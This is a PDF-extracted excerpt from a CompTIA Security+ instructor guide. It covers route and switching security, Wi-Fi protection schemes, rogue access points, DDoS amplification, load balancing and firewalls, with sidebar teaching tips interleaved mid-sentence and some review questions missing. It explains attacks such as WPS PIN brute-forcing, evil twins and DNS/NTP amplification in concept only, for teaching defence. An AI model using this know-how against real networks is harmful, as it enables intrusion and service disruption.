as Nessus and OpenVAS, Windows Management Instrumentation (WMI) queries, and log parsers.
(Screenshot used with permission from packetfence.org.)
Some NAC solutions can perform agentless posture assessment. This is useful when
Show Slide(s) the NAC solution must support a wide range of devices, such as smartphones, tablets,
and Internet of Things (IoT) devices, but less detailed information about the client is
Route Security available with an agentless solution.
Teaching
Tip
Route Security
Students may benefit A successful attack against route security enables the attacker to redirect traffic from
from further reading its intended destination. On the Internet, this may allow the threat actor to herd users
on switching and to spoofed websites. On an enterprise network, it may facilitate circumventing firewalls
routing attacks. Cisco's
website is a valuable
and security zones to allow lateral movement and data exfiltration.
source of information Routes between networks and subnets can be configured manually, but most routers
and advice.
automatically discover routes by communicating with each other. Dynamic routers
Point out that you will exchange information about routes using routing protocols. It is important that this
discuss the functions
traffic be separated from channels used for other types of data. Routing protocols
of firewalls in more
detail later in the do not always have effective integral security mechanisms, so they need to run in an
course. environment where access is very tightly controlled.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 233
Sample routing table showing routes obtained from different sources, such as static configuration,
direct connection, and learned from the Border Gateway Protocol (BGP) routing protocol.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
234 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Secure Switching and Routing
Answer the following questions:
The attacker could trick computers into sending traffic through the attacker's computer
(performing a MitM/on-path attack) and, therefore, examine traffic that would not
normally be accessible to him (on a switched network).
Enable the appropriate guards (portfast and BPDU Guard) on access ports.
Dynamic ARP inspection—though this relies upon DHCP snooping being enabled.
Some network access control (NAC) solutions perform host health checks via a local
agent, running on the host. A dissolvable agent is one that is executed in the host's
memory and CPU but not installed to a local disk.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 235
Topic 9C
Teaching
Tip
This is a long topic,
but hopefully students
should understand the
basics already. Focus
Wireless Network
Installation
EXAM OBJECTIVES COVERED Considerations
1.4 Given a scenario, analyze potential indicators associated with network attacks
3.4 Given a scenario, install and configure wireless security settings Teaching
Tip
Technically, where
Most organizations have both a wired and a wireless network for employees to access multiple access points
provision the same
while on the move within their facilities. Understanding the potential threats and
network, the SSID
vulnerabilities will allow you to successfully secure the wireless components of an should be referred to
organization's information systems infrastructure. as an Extended SSID
(ESSID).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
236 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 237
known as a fat WAP, while one that requires a wireless controller in order to function is
known as a thin WAP.
Controllers and access points must be made physically secure, as tampering could
allow a threat actor to insert a rogue/evil twin WAP to try to intercept logons. These
devices must be managed like switches and routers, using secure management
interfaces and strong administrative credentials.
As well as the site design, a wireless network must be configured with security settings. Wi-Fi Protected Access
Without encryption, anyone within range can intercept and read packets passing over
the wireless network. These choices are determined by device support for the various Teaching
Wi-Fi security standards, by the type of authentication infrastructure, and by the Tip
purpose of the WLAN. The security standard determines the cryptographic protocols WEP, WPA, and TKIP
that are supported, the means of generating the encryption key, and available have been removed
methods for authenticating wireless stations when they try to join (or associate with) from the objectives,
the network. but it seems safer
to mention them, if
The first version of Wi-Fi Protected Access (WPA) was designed to fix critical only as comparison to
vulnerabilities in the earlier wired equivalent privacy (WEP) standard. Like WEP, WPA2/WPA3.
version 1 of WPA uses the RC4 stream cipher but adds a mechanism called the We also mention Wi-Fi
Temporal Key Integrity Protocol (TKIP) to make it stronger. 6 as a note. This is
not on the current
syllabus, but students
will quickly encounter
it, so it seems worthy
of inclusion.
Interaction
Configuring a TP-LINK SOHO access point with wireless encryption and authentication settings. In this Opportunity
example, the 2.4 GHz band allows legacy connections with WPA2-Personal security, while the 5 GHz You could ask students
network is for 802.11ax (Wi-Fi 6) capable devices using WPA3-SAE authentication. to try some of the
(Screenshot used with permission from TP-Link Technologies.) emulators available
from vendor sites.
The emulator shown
Neither WEP nor the original WPA version are considered secure enough for continued
in the screenshot is at
use. WPA2 uses the Advanced Encryption Standard (AES) cipher with 128-bit keys, emulator.tp-link.com/
deployed within the Counter Mode with Cipher Block Chaining Message Authentication Archer_AX20v1_US_
Code Protocol (CCMP). AES replaces RC4 and CCMP replaces TKIP. CCMP provides simulator/#wireless
authenticated encryption, which is designed to make replay attacks harder. SettingsAdv.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
238 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Weaknesses have also been found in WPA2, however, which has led to its intended
replacement by WPA3. The main features of WPA3 are as follows:
• Simultaneous Authentication of Equals (SAE)—replaces WPA's 4-way handshake
authentication and association mechanism with a protocol based on Diffie-Hellman
key agreement.
• Updated cryptographic protocols—replaces AES CCMP with the AES Galois Counter
Mode Protocol (GCMP) mode of operation. Enterprise authentication methods must
use 192-bit AES, while personal authentication can use either 128-bit or 192-bit.
Wi-Fi performance also depends on support for the latest 802.11 standards. The most
recent generation (802.11ax) is being marketed as Wi-Fi 6. The earlier standards are
retroactively named Wi-Fi 5 (802.11ac) and Wi-Fi 4 (802.11n). The performance standards
are developed in parallel with the WPA security specifications. Most Wi-Fi 6 devices and
some Wi-Fi 5 and Wi-Fi 4 products should support WPA3, either natively or with a firmware/
driver update.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 239
handshake to obtain the hash value and try to use an offline brute-force or dictionary
attack to recover the password. Dragonfly also implements ephemeral session keys,
providing forward secrecy.
The configuration interfaces for access points can use different labels for these methods.
You might see WPA2-Personal and WPA3-SAE rather than WPA2-PSK and WPA3-Personal, for
example. Additionally, an access point can be configured for WPA3 only or with support for
legacy WPA2 (WPA3-Personal Transition mode). Researchers already found flaws in WPA3-
Personal, one of which relies on a downgrade attack to use WPA2 (wi-fi.org/security-update-
april-2019).
As setting up an access point securely is relatively complex for residential consumers, Wi-Fi Protected Setup
vendors have developed a system to automate the process called Wi-Fi Protected
Setup (WPS). To use WPS, both the access point and wireless station (client device)
must be WPS-capable. Typically, the devices will have a push button. Activating this on
the access point and the adapter simultaneously will associate the devices using a PIN,
then associate the adapter with the access point using WPA2. The system generates a
random SSID and PSK. If the devices do not support the push button method, the PIN
(printed on the WAP) can be entered manually.
Unfortunately, WPS is vulnerable to a brute force attack. While the PIN is eight
characters, one digit is a checksum and the rest are verified as two separate PINs of
four and three characters. These separate PINs are many orders of magnitude simpler
to brute force, typically requiring just hours to crack. On some models, disabling
WPS through the admin interface does not actually disable the protocol, or there is
no option to disable it. Some APs can lock out an intruder if a brute force attack is
detected, but in some cases the attack can just be resumed when the lockout period
expires. To counter this, the lockout period can be increased. However, this can leave
APs vulnerable to a denial of service (DoS) attack. When provisioning a WAP, it is
essential to verify what steps the vendor has taken to make their WPS implementation
secure and the firmware level required to assure security.
The Easy Connect method, announced alongside WPA3, is intended to replace WPS as
a method of securely configuring client devices with the information required to access
a Wi-Fi network. Easy Connect is a brand name for the Device Provisioning Protocol
(DPP). Each participating device must be configured with a public/private key pair. Easy
Connect uses quick response (QR) codes or near-field communication (NFC) tags to
communicate each device's public key. A smartphone is registered as an Easy Connect
configurator app, and associated with the WAP using its QR code. Each client device can
then be associated by scanning its QR code or NFC tag in the configurator app. As well
as fixing the security problems associated with WPS, this is a straightforward means of
configuring headless Internet of Things (IoT) devices with Wi-Fi connectivity.
A quick response (QR) code is a barcode standard for encoding arbitrary alphanumeric or
binary strings within a square block pattern. The codes can be scanned using any type of
digital camera. Show Slide(s)
Open Authentication
and Captive Portals
Open Authentication and Captive Portals
Teaching
Selecting open authentication means that the client is not required to authenticate. Tip
This mode would be used on a public WAP (or "hotspot"). In WPA2, this also means Make sure students
that data sent over the link is unencrypted. Open authentication may be combined understand risks from
with a secondary authentication mechanism managed via a browser. When the client open access points.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
240 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
associates with the open hotspot and launches the browser, the client is redirected
to a captive portal or splash page. This will allow the client to authenticate to the
hotspot provider's network (over HTTPS, so the login is secure). The portal may also
be designed to enforce terms and conditions and/or take payment to access the
Wi-Fi service.
When using open wireless, users must ensure they send confidential web data only
over HTTPS connections and only use email, VoIP, IM, and file transfer services with
SSL/TLS enabled. Another option is for the user to join a Virtual Private Network
(VPN). The user would associate with the open hotspot then start the VPN connection.
This creates an encrypted "tunnel" between the user's computer and the VPN
server. This allows the user to browse the web or connect to email services without
anyone eavesdropping on the open Wi-Fi network being able to intercept those
communications. The VPN could be provided by the user's company or they could use
a third-party VPN service provider. Of course, if using a third party, the user needs to
be able to trust them implicitly. The VPN must use certificate-based tunneling to set up
the "inner" authentication method.
WPA3 can implement a mode called Wi-Fi Enhanced Open, which uses opportunistic
Show Slide(s) wireless encryption (OWE). OWE uses the Dragonfly handshake to agree ephemeral
session keys on joining the network. This means that one station cannot sniff the traffic
Enterprise/IEEE 802.1X from another station, because they are using different session keys. There is still no
Authentication authentication of the access point, however.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 241
Using Cisco's Virtual Wireless LAN Controller to set security policies for a WLAN—this policy enforces
use of WPA2 and the use of 802.1X (Enterprise) authentication.
(Screenshot used with permission from Cisco.)
The Extensible Authentication Protocol (EAP) defines a framework for negotiating Extensible
authentication mechanisms rather than the details of the mechanisms themselves. Authentication
Vendors can write extensions to the protocol to support third-party security devices. Protocol
EAP implementations can include smart cards, one-time passwords, biometric
identifiers, or simpler username and password combinations. Teaching
Tip
EAP-TLS is one of the strongest types of authentication and is very widely supported.
In the exam objectives,
An encrypted Transport Layer Security (TLS) tunnel is established between the the specific EAP
supplicant and authentication server using public key certificates on the authentication types are strongly
server and supplicant. As both supplicant and server are configured with certificates, associated with
this provides mutual authentication. The supplicant will typically provide a certificate wireless security,
using a smart card or a certificate could be installed on the client device, possibly in a so they are covered
here rather than with
Trusted Platform Module (TPM).
other authentication
technologies, but they
are applicable to any
sort of network access
device.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
242 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Configuring Network Policy Server to authenticate wireless clients using 802.1X EAP-TLS.
(Screenshot used with permission from Microsoft.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 243
Most implementations of EAP use a RADIUS server to validate the authentication RADIUS Federation
credentials for each user (supplicant). RADIUS federation means that multiple
organizations allow access to one another's users by joining their RADIUS servers into a
RADIUS hierarchy or mesh. For example, when Bob from widget.foo needs to log on to
grommet.foo's network, the RADIUS server at grommet.foo recognizes that Bob is not
a local user but has been granted access rights and routes the request to widget.foo's
RADIUS server.
One example of RADIUS federation is the eduroam network (eduroam.org), which
allows students of universities from several different countries to log on to the
networks of any of the participating institutions using the credentials stored by their
"home" university.
A rogue access point is one that has been installed on the network without Rogue Access Points
authorization, whether with malicious intent or not. It is vital to periodically survey and Evil Twins
the site to detect rogue WAPs. A malicious user can set up such an access point with
something as basic as a smartphone with tethering capabilities, and a non-malicious Teaching
user could enable such an access point by accident. If connected to a LAN without Tip
security, an unauthorized WAP creates a backdoor through which to attack the Stress the importance
network. A rogue WAP could also be used to capture user logon attempts, allow man- of disabling unused
in-the-middle attacks, and allow access to private information. connections and
services and scanning
A rogue WAP masquerading as a legitimate one is called an evil twin. An evil twin for rogue systems.
might just have a similar name (SSID) to the legitimate one, or the attacker might use
some DoS technique to overcome the legitimate WAP. This attack will not succeed
if authentication security is enabled on the WAP, unless the attacker also knows the
details of the authentication method. However, the evil twin might be able to harvest
authentication information from users entering their credentials by mistake.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
244 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Surveying Wi-Fi networks using Cambium Networks (formerly Xirrus) Wi-Fi Inspector—Note the presence
of print devices configured with open authentication (no security) and a smart TV appliance
(requiring authentication). (Screenshot used with permission from Xirrus.)
A rogue hardware WAP can be identified through physical inspections. There are also
various Wi-Fi analyzers and monitoring systems that can detect rogue WAPs, including
inSSIDer (metageek.com/products/inssider), Kismet (kismetwireless.net), and Cambium
Networks (formerly Xirrus) Wi-Fi Inspector (cambiumnetworks.com/products/software/
wifi-designer-and-wifi-inspector).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 245
ARP packet, and replaying this rapidly, causing the WAP to cycle through IV values
quickly, revealing the hash part.
WPA and WPA2 are not vulnerable to IV attacks, but a serious vulnerability was
discovered in 2017 (krackattacks.com). A KRACK attack uses a replay mechanism
that targets the 4-way handshake. KRACK is effective regardless of whether the
authentication mechanism is personal or enterprise. It is important to ensure both
clients and access points are fully patched against such attacks.
A wireless network can be disrupted by interference from other radio sources. These Jamming Attacks
are often unintentional, but it is also possible for an attacker to purposefully jam
an access point. This might be done simply to disrupt services or to position an evil
twin on the network with the hope of stealing data. A Wi-Fi jamming attack can be
performed by setting up a WAP with a stronger signal. Wi-Fi jamming devices are
also widely available, though they are often illegal to use and sometimes to sell. Such
devices can be very small, but the attacker still needs to gain fairly close physical
proximity to the wireless network.
The only ways to defeat a jamming attack are either to locate the offending radio
source and disable it, or to boost the signal from the legitimate equipment. WAPs
for home and small business use are not often configurable, but the more advanced
wireless access points, such as Cisco's Aironet series, support configurable power
level controls. The source of interference can be detected using a spectrum analyzer.
Unlike a Wi-Fi analyzer, a spectrum analyzer must use a special radio receiver (Wi-
Fi adapters filter out anything that isn't a Wi-Fi signal). They are usually supplied as
handheld units with a directional antenna, so that the exact location of the interference
can be pinpointed.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
246 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Secure Wireless Infrastructure
Answer the following questions:
1. True or false? Band selection has a critical impact on all aspects of the
security of a wireless network?
False—band selection can affect availability and performance but does not have an
impact in terms of either confidentiality or integrity.
You need a wireless controller to configure and manage the access points. This makes
each access point more tamper-proof as there is no local administration interface.
Configuration errors should also be easier to identify.
This is a type of group authentication used when the infrastructure for authenticating
securely (via RADIUS, for instance) is not available. The system depends on the strength
of the passphrase used for the key.
No, an enterprise network will use RADIUS authentication. WPS uses PSK and there are
weaknesses in the protocol.
5. You want to deploy a wireless network where only clients with domain-
issued digital certificates can join the network. What type of authentication
mechanism is suitable?
EAP-TLS is the best choice because it requires that both server and client be installed
with valid certificates.
6. John is given a laptop for official use and is on a business trip. When he
arrives at his hotel, he turns on his laptop and finds a wireless access
point with the name of the hotel, which he connects to for sending official
communications. He may become a victim of which wireless threat?
Evil twin.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 247
Topic 9D
Implement Load Balancers
In a distributed reflection DoS (DRDoS) or amplification SYN flood attack, the threat Show Slide(s)
actor spoofs the victim's IP address and attempts to open connections with multiple
servers. Those servers direct their SYN/ACK responses to the victim server. This rapidly
Amplification,
consumes the victim's available bandwidth. Application, and OT
Attacks
Application Attacks
Teaching
Where a network attack uses low-level techniques, such as SYN or SYN/ACK flooding,
Tip
an application attack targets vulnerabilities in the headers and payloads of specific
We'll be revisiting
application protocols. For example, one type of amplification attack targets DNS
OT when covering
services with bogus queries. One of the advantages of this technique is that while embedded systems in
the request is small, the response to a DNS query can be made to include a lot of Lesson 12.
information, so this is a very effective way of overwhelming the bandwidth of the victim
network with much more limited resources on the attacker's botnet.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
248 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
The Network Time Protocol (NTP) can be abused in a similar way. NTP helps servers
on a network and on the Internet to keep the correct time. It is vital for many protocols
and security mechanisms that servers and clients be synchronized. One NTP query
(monlist) can be used to generate a response containing a list of the last 600 machines
that the NTP server has contacted. As with the DNS amplification attack, this allows a
short request to direct a long response at the victim network.
As well as being the target of an attack, embedded systems might be used as bots. Any type
of Internet-enabled device is vulnerable to compromise. This includes web-enabled cameras,
SOHO routers, and smart TVs and other appliances. This is referred to as an Internet of
Things (IoT) botnet.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 249
When a network is faced with a DDoS or similar flooding attack, an ISP can use either an
access control list (ACL) or a blackhole to drop packets for the affected IP address(es). A
blackhole is an area of the network that cannot reach any other part of the network. The
blackhole option is preferred, as evaluating each packet in a multi-gigabit stream against
ACLs overwhelms the processing resources available. A standard method of doing this
with border gateway protocol (BGP) routing is called a remotely triggered blackhole
(RTBH) (cisco.com/c/dam/en_us/about/security/intelligence/blackhole.pdf). The blackhole
also makes the attack less damaging to the ISP's other customers. With both approaches,
legitimate traffic is discarded along with the DDoS packets.
Another option is to use sinkhole routing so that the traffic flooding a particular IP address
is routed to a different network where it can be analyzed. Potentially some legitimate traffic
could be allowed through, but the real advantage is to identify the source of the attack
and devise rules to filter it. The target can then use low TTL DNS records to change the IP
address advertised for the service and try to allow legitimate traffic past the flood.
There are cloud DDoS mitigation services that can act as sinkhole network providers and try
to "scrub" flooded traffic.
A load balancer distributes client requests across available server nodes in a farm or Load Balancing
pool. This is used to provision services that can scale from light to heavy loads, and to
provide mitigation against DDoS attacks. A load balancer also provides fault tolerance. If
there are multiple servers available in a farm, all addressed by a single name/IP address
via a load balancer, then if a single server fails, client requests can be routed to another
server in the farm. You can use a load balancer in any situation where you have multiple
servers providing the same function. Examples include web servers, front-end email
servers, and web conferencing, A/V conferencing, or streaming media servers.
There are two main types of load balancers:
• Layer 4 load balancer—basic load balancers make forwarding decisions on IP
address and TCP/UDP port values, working at the transport layer of the OSI model.
• Layer 7 load balancer (content switch)—as web applications have become more
complex, modern load balancers need to be able to make forwarding decisions
based on application-level data, such as a request for a particular URL or data types
like video or audio streaming. This requires more complex logic, but the processing
power of modern appliances is sufficient to deal with this.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
250 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Scheduling
The scheduling algorithm is the code and metrics that determine which node is
selected for processing each incoming request. The simplest type of scheduling is
called round robin; this just means picking the next node. Other methods include
picking the node with the fewest connections or the best response time. Each method
can also be weighted, using administrator set preferences or dynamic load information
or both.
The load balancer must also use some type of heartbeat or health check probe to verify
whether each node is available and under load or not. Layer 4 load balancers can only
make basic connectivity tests while layer 7 appliances can test the application's state,
as opposed to only verifying host availability.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 251
Application Clustering
Clustering is also very commonly used to provision fault tolerant application services.
If an application server suffers a fault in the middle of a session, the session state data
will be lost. Application clustering allows servers in the cluster to communicate session
information to one another. For example, if a user logs in on one instance, the next
session can start on another instance, and the new server can access the cookies or
other information used to establish the login.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
252 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
3. If the switch supports QoS, it uses the 802.1p header to prioritize the frame. Note
that it can only do this by holding a queue of outgoing traffic and delaying non-
priority frames. If the queue is full, a traffic policing policy must state whether
non-priority frames should be dropped, or whether the queue should be cleared
at the expense of reducing QoS.
4. A similar process occurs at routers and load balancers on the network edge,
though they can inspect the DiffServ IP packet header, rather than having to rely
on the more limited 802.1p header. Note that prioritization always takes place on
the outbound interface, with low priority traffic being held in a queue.
There are many variations on this process. Modern layer 3 switches can inspect DSCP
values, rather than relying on 802.1p tagging, for instance. QoS may need to take place over
wireless networks, which use a different tagging mechanism. There is also a wholly different
approach to QoS called IntServ. This uses the Resource Reservation Protocol (RSVP) to
negotiate a link with the performance characteristics required by the application or policy.
QoS marking introduces the potential for DoS attacks. If a threat actor can craft
packets that are treated as high priority and send them at a high rate, the network
can be overwhelmed. Part of QoS involves identifying trust boundaries to establish a
legitimate authority for marking traffic. You should also ensure that there is always
sufficient bandwidth for security-critical monitoring data and network management/
configuration traffic.
For more information, consider these case studies and design overviews from Microsoft
(docs.microsoft.com/en-us/skypeforbusiness/optimizing-your-network/expressroute-and-
qos-in-skype-for-business-online) and Cisco (cisco.com/c/en/us/td/docs/solutions/Enterprise/
WAN_and_MAN/QoS_SRND/QoS-SRND-Book/QoSIntro.html).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 253
Review Activity:
Load Balancers
Answer the following questions:
Most attacks depend on overwhelming the victim. This typically requires a large
number of hosts, or bots.
Where the attacker spoofs the victim's IP in requests to several reflecting servers (often
DNS or NTP servers). The attacker crafts the request so that the reflecting servers
respond to the victim's IP with a large message, overwhelming the victim's bandwidth.
The algorithm and metrics that determine which node a load balancer picks to handle a
request.
True.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
254 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Lesson 9
Summary
Teaching You should be able to use segmentation-based network designs and provision
Tip switching, routing, Wi-Fi, and load balancing technologies for secure network access.
Check that students
are confident about
the content that has
Guidelines for Implementing Secure Network Designs
been covered. If there
Follow these guidelines when you implement designs for new or extended networks:
is time, re-visit any
content examples that • Identify business workflows and the servers, clients, and protocols that support
they have questions them. Design segmented network zones or blocks that support the security
about. If you have
used all the available
requirements, using VLANs, subnets, and firewall policies to implement the design.
time for this lesson
block, note the issues,
• Accommodate special requirements within the design:
and schedule time for
a review later in the
• Demilitarized zone topologies for Internet-facing hosts.
course.
• East-west and zero trust designs for data centers.
• Deploy switching and routing appliances and protocols to support each block,
accounting for loop protection, port security, and route security.
• Open authentication can be used for guest networks, so long as the risks are
understood.
• Evaluate risks from denial of service and design load balanced and clustered
services to provision high availability and fault tolerance.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 10
Implementing Network
Security Appliances
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
256 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 10A
Implement Firewalls and Proxy Servers
There may be additional functionality in some products, such as the ability to block
some types of ICMP (ping) traffic but not others, or the ability to filter by hardware
(MAC) address. Another distinction that can be made is whether the firewall can control
only inbound traffic or both inbound and outbound traffic. This is also often referred to
as ingress and egress traffic or filtering. Controlling outbound traffic is useful because it
can block applications that have not been authorized to run on the network and defeat
malware, such as backdoors. Ingress and egress traffic is filtered using separate ACLs.
Stateless Operation
A basic packet filtering firewall is stateless. This means that it does not preserve
information about network sessions. Each packet is analyzed independently, with
no record of previously processed packets. This type of filtering requires the least
processing effort, but it can be vulnerable to attacks that are spread over a sequence
of packets. A stateless firewall can also introduce problems in traffic flow, especially
when some sort of load balancing is being used or when clients or servers need to use
dynamically assigned ports.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 257
A stateful inspection firewall addresses these problems by tracking information about Stateful Inspection
the session established between two hosts, or blocking malicious attempts to start a Firewalls
bogus session. The vast majority of firewalls now incorporate some level of stateful
inspection capability. Session data is stored in a state table. When a packet arrives, the Teaching
firewall checks it to confirm whether it belongs to an existing connection. If it does not, Tip
it applies the ordinary packet filtering rules to determine whether to allow it. Once the Note that very few,
connection has been allowed, the firewall usually allows traffic to pass unmonitored, in if any, firewalls are
order to conserve processing effort. wholly stateless
anymore. The
principal distinction
is between firewalls
that track state at the
transport layer and
those that can monitor
application sessions.
State table in the pfSense firewall appliance. (Screenshot used with permission
from Rubicon Communications, LLC.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
258 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
pfSense firewall rule configuration—Advanced settings allow maximums for states and
connections to be applied. (Screenshot used with permission from pfsense.org.)
Teaching
iptables
Tip iptables is a command line utility provided by many Linux distributions that allows
iptables is referenced administrators to edit the rules enforced by the Linux kernel firewall (linux.die.net/
in Network+, but not man/8/iptables). iptables works with chains, which apply to the different types of
in Security+, so we traffic, such as the INPUT chain for traffic destined for the local host. Each chain has
include it here as a
recap. If students
a default policy set to DROP or ALLOW traffic that does not match a rule. Each rule,
have not completed processed in order, determines whether traffic matching the criteria is allowed or
Network+, make sure dropped.
they know the basics
of how it operates The command iptables --list INPUT --line-numbers -n will show
and how to read the the contents of the INPUT chain with line numbers and no name resolution. The rules
output. in the following example drop any traffic from the specific host at 10.1.0.192 and allow
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 259
ICMP echo requests (pings), DNS, and HTTP/HTTPS traffic either from the local subnet
(10.1.0.0/24) or from any network (0.0.0.0/0):
Chain INPUT (policy DROP)
# target prot opt source destination
1 DROP all -- 10.1.0.192 0.0.0.0/0
2 ACCEPT icmp -- 10.10.0.0/24 0.0.0.0/0 icmptype 8
3 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:53
4 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:53
5 ACCEPT tcp -- 10.1.0.0/24 0.0.0.0/0 tcp dpt:80
6 ACCEPT tcp -- 10.1.0.0/24 0.0.0.0/0 tcp dpt:443
7 ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 ctstate
RELATED,ESTABLISHED
The destination 0.0.0.0/0 means "anywhere." When set on the INPUT chain, the effect
is to match any IP address that the local host is currently using. The ctstate rule is
a stateful rule that allows any traffic that is part of an established or related session. Show Slide(s)
As established connections should already have been allowed, this reduces processing
requirements to minimize impact on traffic flow.
Firewall
The following command will insert a new rule as line 2 to allow traffic to the SSH server Implementation
TCP port (22) from the local subnet:
Teaching
iptables -I INPUT 2 -p tcp -s 10.1.0.0/24 --dport 22 Tip
-j ACCEPT
Firewalls can be
Different switches can be used to append (-A), delete (-D), or replace (-R) rules. implemented in
many different
ways. They are often
Firewall Implementation implemented as a
function within a
You should consider how the firewall is implemented—as hardware or software, for product, as well as
the dedicated security
instance—to cover a given placement or use on the network. Some types of firewalls
appliances.
are better suited for placement at the network edge or zonal borders; others are
designed to protect individual hosts. Interaction
Opportunity
Firewall Appliances
As with most of these
An appliance firewall is a stand-alone hardware firewall deployed to monitor traffic security appliances,
it is best to look at
passing into and out of a network zone. A firewall appliance can be deployed in two the features of actual
ways: products, rather than
depend too much
• Routed (layer 3)—the firewall performs forwarding between subnets. Each interface
on categorizations.
on the firewall connects to a different subnet and represents a different security Refer students to
zone. vendor sites such
as barracuda.
• Bridged (layer 2)—the firewall inspects traffic passing between two nodes, such com, checkpoint.
as a router and a switch. This is also referred to as transparent mode. The firewall com,fortinet.com,
does not have an IP interface (except for configuration management). It bridges the or pfsense.org. Get
Ethernet interfaces between the two nodes. Despite performing forwarding at layer students to visit one
site per group and
2, the firewall can still inspect and filter traffic on the basis of the full range of packet then compare features
headers. The typical use case for a transparent firewall is to deploy it without having supported by the
to reconfigure subnets and reassign IP addresses on other devices. different vendors.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
260 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Cisco ASA (Adaptive Security Appliance) ASDM (Adaptive Security Device Manager) interface.
(Screenshot used with permission from Cisco.)
Application-Based Firewalls
Firewalls can also run as software on any type of computing host. There are several
types of application-based firewalls:
• Host-based firewall (or personal firewall)—implemented as a software
application running on a single host designed to protect that host only. As well as
enforcing packet filtering ACLs, a personal firewall can be used to allow or deny
software processes from accessing the network.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 261
The amount of rebuilding depends on the proxy. Some proxies may only manipulate the
IP and TCP headers. Application-aware proxies might add or remote HTTP headers. A deep
packet inspection proxy might be able to remove content from an HTTP payload.
Configuring content filter settings for the Squid proxy server (squid-cache.org) running on pfSense.
The filter can apply ACLs and time-based restrictions, and use blacklists to prohibit access to URLs.
(Screenshot used with permission from Rubicon Communications, LLC.)
The main benefit of a proxy is that client computers connect to a specified point on
the perimeter network for web access. The proxy can be positioned within a DMZ.
This provides for a degree of traffic management and security. In addition, most web
proxy servers provide caching engines, whereby frequently requested web pages
are retained on the proxy, negating the need to re-fetch those pages for subsequent
requests.
A proxy server must understand the application it is servicing. For example, a web
proxy must be able to parse and modify HTTP and HTTPS commands (and potentially
HTML and scripts too). Some proxy servers are application-specific; others are
multipurpose. A multipurpose proxy is one configured with filters for multiple protocol
types, such as HTTP, FTP, and SMTP.
Proxy servers can generally be classed as non-transparent or transparent.
• A non-transparent proxy means that the client must be configured with the proxy
server address and port number to use it. The port on which the proxy server
accepts client connections is often configured as port 8080.auto
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
262 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Configuring transparent proxy settings for the Squid proxy server (squid-cache.org) running on pfSense.
(Screenshot used with permission from Rubicon Communications, LLC.)
